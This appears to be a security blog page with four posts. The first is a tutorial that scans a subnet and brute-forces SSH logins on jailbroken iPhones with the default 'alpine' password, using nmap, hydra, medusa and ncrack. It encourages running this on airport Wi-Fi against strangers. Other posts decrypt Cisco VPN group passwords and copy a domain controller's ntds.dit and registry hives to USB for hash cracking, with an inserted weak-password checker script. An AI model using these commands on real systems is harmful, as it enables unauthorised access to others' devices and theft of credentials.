Friday, November 4, 2016

Scan a subnet to find jailbroken iPhones with the default password

After jailbreaking, most users install OpenSSH on their iOS device. However, some of them do not know about, or simply forget to change, the default password. Below is the user list of an iPhone:

The default password of the username root and mobile is “alpine”.

So our goal is to scan a whole subnet and find out whether any jailbroken iOS devices accept an SSH login with the default username and password.

Tools: nmap (v7.01), hydra (v8.1), medusa (v2.2) or ncrack (v0.4ALPHA).

1. Connect your computer to the wireless network and find out the IP range:

2. Use nmap to generate a hosts list: nmap -sL | grep "Nmap scan report" | awk '{print $NF}' > hosts.lst

3. Or, if you only want to scan the live hosts, use the command: nmap -sP -n | grep "Nmap scan report" | awk '{print $NF}' > liveHosts.lst

4. Create 2 text files: username.txt and password.txt

5. Run the command: hydra -t 4 -L username.txt -P password.txt -M hosts.lst -s 22 ssh

6. It took 12 minutes to get the password:

7. Or you can use medusa: medusa -H liveHosts.lst -U username.txt -P password.txt -M ssh

8. Ncrack can also do the job: ncrack -p ssh -U username.txt -P password.txt -iL liveHosts.lst --exclude
   You can press 'p' to list the discovered credentials during the scan.

Following the steps above, you can easily modify the username and password files to perform a dictionary or brute-force attack.

OK, that’s it. Next time you go to an airport, connect your Kali Linux to the free Wi-Fi, have a cup of coffee and scan the whole subnet. You might be surprised.

BTW, to change the password, just SSH to the iPhone as root and run the commands “passwd” and “passwd mobile”.

Friday, July 15, 2016

Check Your Google account activity

It is a good security practice to check your Google Account activity history regularly.

1. Check Gmail login history
  1) Log in to your Gmail mailbox and scroll to the bottom of the page; on the right-hand side there is a “Details” link.
  2) Clicking “Details” brings up the Gmail login history:
  3) If someone has logged in to your account from another location, you can click “Sign out all other web sessions” to sign them out.
  4) It is recommended to select the “Show an alert for unusual activity” option.

2. Check recently used devices
  1) Log in to your Google account.
  2) Open (copy & paste) this link:
  3) The page lists the devices that have been active on your account in the last 28 days.

3. Check all activity history, including web browsing:
  1) Log in to your Google account.
  2) Open (copy & paste) this link:

Wednesday, June 29, 2016

Extract Cisco VPN group Password from .pcf file

So you got a .pcf file. On Windows it is easy to just copy it into the Cisco VPN client folder, but on a MacBook you still need the Group Password to set the connection up.

In the .pcf file the Group Password is stored encrypted. You may want to decrypt the string to get the clear-text password. There are some online websites that can do the job; however, you normally don’t want to submit this kind of information to a public site.

Kali has a tool to decrypt it locally (cisco-decrypt, from the vpnc package). Simply enter:

#cisco-decrypt [Encrypted Group Password String]

Saturday, April 23, 2016

Windows Password Audit – Copy ntds.dit

Companies should perform a password audit annually.

The process normally is:

  1. Log in to a domain controller and export ntds.dit, SAM and SYSTEM using a shadow copy.
  2. Extract the hashes from the above files (using NTDSXtract or the SANS Investigative Forensic Toolkit (SIFT)).
  3. Use an offline cracking tool to crack the hashes: Cain, ophcrack, etc.
A weak password can be defined as follows:

  1. All LM hashes are considered weak.
  2. A password is considered short and weak if its length is less than 8.
  3. Repeated sequences of a single character, e.g. ‘111111’, ‘aaaaaa’, are considered weak.
  4. Simple patterns, e.g. ‘123456’, ‘abcdefgh’, are considered weak.
  5. Keyboard combination patterns, based on all possible keyboard combinations like ‘qwerty’, ‘qazwsx’, etc.
  6. National keyboard combination patterns: the same as the previous rule, but using a national keyboard layout.
  7. User name mutation patterns, for passwords based on the user name.
  8. “Freaked” (leet-speak) passwords, e.g. ‘pa$$w0rd’, ‘@pp1e’, etc.
  9. Dictionary attack against well-known passwords, e.g. the leaked Facebook, LinkedIn and eHarmony passwords, which can be downloaded from the Internet.
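As an added example (not from the original post), a small Python audit that applies rules 1 to 5 and 7 to 9 of the list above to accounts recovered from the ntds.dit dump. The leaked-password set, the keyboard runs and the leet table are constructed assumptions, and national layouts (rule 6) are left out.

```python
import itertools

# Constructed stand-in for a leaked-password list; the page suggests downloading real leak dumps.
LEAKED = {"password", "alpine", "letmein", "welcome", "apple", "linkedin", "football"}
# LM field of an account that has no LM hash stored; anything else means an LM hash exists (rule 1).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# US layout rows plus the column walk (qaz, wsx, edc, ...); national layouts (rule 6) would be appended.
KEYBOARD_RUNS = ["1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm",
                 "qazwsxedcrfvtgbyhnujmikolp"]
# Leet substitutions for rule 8 (constructed table); '1' is ambiguous, so both readings are tried.
LEET = {"$": "s", "@": "a", "0": "o", "1": "li", "3": "e", "4": "a", "5": "s", "7": "t", "!": "i"}

def unleet(password):
    """Return every plain-text reading of a leet-speak password ('pa$$w0rd' -> {'password'})."""
    choices = [LEET.get(c, c) for c in password.lower()]
    return {"".join(p) for p in itertools.product(*choices)}

def is_sequence(password):
    """Rule 4: each character is the previous one +1 (or each is -1), e.g. '123456', 'abcdefgh'."""
    steps = {ord(b) - ord(a) for a, b in zip(password, password[1:])}
    return len(password) >= 3 and steps in ({1}, {-1})

def is_keyboard_walk(password):
    """Rule 5: the whole password lies on one keyboard row or column walk, forwards or backwards."""
    low = password.lower()
    return len(low) >= 4 and any(low in run or low in run[::-1] for run in KEYBOARD_RUNS)

def audit(username, password, lm_hash=None, leaked=LEAKED):
    """Return the rules (numbered as in the list above) that a cracked account violates."""
    low, user, reasons = password.lower(), username.lower(), []
    if lm_hash and lm_hash.lower() != EMPTY_LM:
        reasons.append("1:lm-hash")
    if len(password) < 8:
        reasons.append("2:short")
    if len(set(password)) == 1:
        reasons.append("3:repeated")
    if is_sequence(password):
        reasons.append("4:simple-pattern")
    if is_keyboard_walk(password):
        reasons.append("5:keyboard")
    if len(user) >= 3 and (user in low or user[::-1] in low):
        reasons.append("7:username")
    if low not in leaked and unleet(password) & leaked:
        reasons.append("8:leet")
    if low in leaked:
        reasons.append("9:dictionary")
    return reasons
```

Feed it the (username, cracked password, LM hash field) triples from the dump; an empty list means the account passed every rule implemented here.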

Step 1: Create a shadow copy for copying the password files

  1. Log on to a domain controller as a member of the Enterprise Admins group or the Domain Admins group.
  2. Click Start, right-click Command Prompt, and then click Run as administrator.
  3. If the User Account Control dialog box appears, confirm that the action it displays is what you want, and then click Continue.
  4. At the elevated command prompt, type the following command, and then press ENTER: ntdsutil
  5. At the ntdsutil prompt, type the following command, and then press ENTER: snapshot
  6. At the snapshot prompt, type the following command, and then press ENTER:
activate instance ntds
  7. At the snapshot prompt, type the following command, and then press ENTER:
The command returns the following output:
Snapshot set {GUID} generated successfully.
where GUID is the globally unique identifier (GUID) of the snapshot.
  8. At the snapshot prompt, type the following command, and then press ENTER:
mount { GUID }
  9. Optionally, to see a list of all mounted snapshots, type the following command, and then press ENTER:
list mounted
The output lists each mounted snapshot and a corresponding index number. You can use the index number instead of the GUID to subsequently mount, unmount, or delete the snapshot.

  10. Open another command prompt as Administrator.
  11. Run the following commands:

E:\temp>copy c:\$SNAP_201603102306_VOLUMEC$\Windows\ntds\ntds.dit
       1 file(s) copied.
E:\temp>copy c:\$SNAP_201603102306_VOLUMEC$\windows\system32\config\SYSTEM
        1 file(s) copied.
E:\temp>copy c:\$SNAP_201603102306_VOLUMEC$\windows\system32\config\SAM
        1 file(s) copied.
E:\temp>reg SAVE HKLM\SYSTEM .\sys

  12. Copy these 4 files to a USB drive.
  13. To unmount the snapshot after you have finished viewing the data, type either of the following commands, and then press ENTER:
unmount index #
unmount { GUID }
  14. Delete old snapshots that you are no longer using, because they consume disk space. To delete a snapshot, type either of the following commands, and then press ENTER:
delete index #
delete { GUID }
  15. After you are done with the snapshot operations, type quit to return to the ntdsutil menu, and then type quit again to return to the command prompt.